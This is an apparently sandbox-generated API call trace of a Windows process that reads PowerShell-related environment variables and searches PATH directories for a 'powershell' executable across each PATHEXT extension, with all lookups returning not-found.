	[0805.115] CoTaskMemFree (pv=0x33ab50) 
	[0806.184] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0806.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.184] CoTaskMemFree (pv=0x33ab50) 
	[0806.186] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0806.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.186] CoTaskMemFree (pv=0x33ab50) 
	[0806.188] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0806.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.188] CoTaskMemFree (pv=0x33ab50) 
	[0806.190] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0806.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.190] CoTaskMemFree (pv=0x33ab50) 
	[0806.192] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0806.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.192] CoTaskMemFree (pv=0x33ab50) 
	[0806.193] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0806.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.194] CoTaskMemFree (pv=0x33ab50) 
	[0806.878] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0806.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.878] CoTaskMemFree (pv=0x33ab50) 
	[0806.896] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0806.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.896] CoTaskMemFree (pv=0x33ab50) 
	[0809.321] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0809.321] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0809.321] CoTaskMemFree (pv=0x33ab50) 
	[0809.324] CoTaskMemAlloc (cb=0x104) returned 0x33ab50
	[0809.324] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x33ab50, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0809.324] CoTaskMemFree (pv=0x33ab50) 
	[0809.324] CoTaskMemAlloc (cb=0x128) returned 0x1b3e6050
	[0809.324] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b3e6050, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0809.324] CoTaskMemFree (pv=0x1b3e6050) 
	[0809.329] CoTaskMemAlloc (cb=0x20e) returned 0x1b3dff70
	[0809.330] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b3dff70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0809.330] CoTaskMemFree (pv=0x1b3dff70) 
	[0809.334] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0809.335] SetErrorMode (uMode=0x1) returned 0x1
	[0809.338] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.230] SetErrorMode (uMode=0x1) returned 0x1
	[0810.232] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.232] SetErrorMode (uMode=0x1) returned 0x1
	[0810.232] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.241] SetErrorMode (uMode=0x1) returned 0x1
	[0810.242] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.242] SetErrorMode (uMode=0x1) returned 0x1
	[0810.242] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.251] SetErrorMode (uMode=0x1) returned 0x1
	[0810.253] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.253] SetErrorMode (uMode=0x1) returned 0x1
	[0810.253] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.262] SetErrorMode (uMode=0x1) returned 0x1
	[0810.263] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.263] SetErrorMode (uMode=0x1) returned 0x1
	[0810.263] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.210] SetErrorMode (uMode=0x1) returned 0x1
	[0811.211] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.211] SetErrorMode (uMode=0x1) returned 0x1
	[0811.211] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.221] SetErrorMode (uMode=0x1) returned 0x1
	[0811.222] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.222] SetErrorMode (uMode=0x1) returned 0x1
	[0811.222] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.233] SetErrorMode (uMode=0x1) returned 0x1
	[0811.235] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.235] SetErrorMode (uMode=0x1) returned 0x1
	[0811.235] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.244] SetErrorMode (uMode=0x1) returned 0x1
	[0811.245] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.245] SetErrorMode (uMode=0x1) returned 0x1
	[0811.245] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.320] SetErrorMode (uMode=0x1) returned 0x1
	[0812.321] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.321] SetErrorMode (uMode=0x1) returned 0x1
	[0812.321] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.329] SetErrorMode (uMode=0x1) returned 0x1
	[0812.331] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.331] SetErrorMode (uMode=0x1) returned 0x1
	[0812.331] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.339] SetErrorMode (uMode=0x1) returned 0x1
	[0812.341] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.341] SetErrorMode (uMode=0x1) returned 0x1
	[0812.341] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.350] SetErrorMode (uMode=0x1) returned 0x1
	[0812.351] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.351] SetErrorMode (uMode=0x1) returned 0x1
	[0812.351] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.809] SetErrorMode (uMode=0x1) returned 0x1
	[0813.810] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.810] SetErrorMode (uMode=0x1) returned 0x1
	[0813.810] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.819] SetErrorMode (uMode=0x1) returned 0x1
	[0813.820] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.820] SetErrorMode (uMode=0x1) returned 0x1
	[0813.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.829] SetErrorMode (uMode=0x1) returned 0x1
	[0813.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.831] SetErrorMode (uMode=0x1) returned 0x1
	[0813.831] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.832] SetErrorMode (uMode=0x1) returned 0x1
	[0813.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.832] SetErrorMode (uMode=0x1) returned 0x1
	[0813.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.833] SetErrorMode (uMode=0x1) returned 0x1
	[0813.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.833] SetErrorMode (uMode=0x1) returned 0x1
	[0813.833] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.833] SetErrorMode (uMode=0x1) returned 0x1
	[0813.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.834] SetErrorMode (uMode=0x1) returned 0x1
	[0813.834] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.834] SetErrorMode (uMode=0x1) returned 0x1
	[0813.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.834] SetErrorMode (uMode=0x1) returned 0x1
	[0813.835] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.835] SetErrorMode (uMode=0x1) returned 0x1
	[0813.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.835] SetErrorMode (uMode=0x1) returned 0x1
	[0813.835] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.836] SetErrorMode (uMode=0x1) returned 0x1
	[0813.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.836] SetErrorMode (uMode=0x1) returned 0x1
	[0813.836] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.836] SetErrorMode (uMode=0x1) returned 0x1
	[0813.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.837] SetErrorMode (uMode=0x1) returned 0x1
	[0813.837] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.837] SetErrorMode (uMode=0x1) returned 0x1
	[0813.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.150] SetErrorMode (uMode=0x1) returned 0x1
	[0815.150] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c68d8c0 | out: lpFindFileData=0x1c68d8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.151] SetErrorMode (uMode=0x1) returned 0x1
	[0815.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.151] SetErrorMode (uMode=0x1) returned 0x1
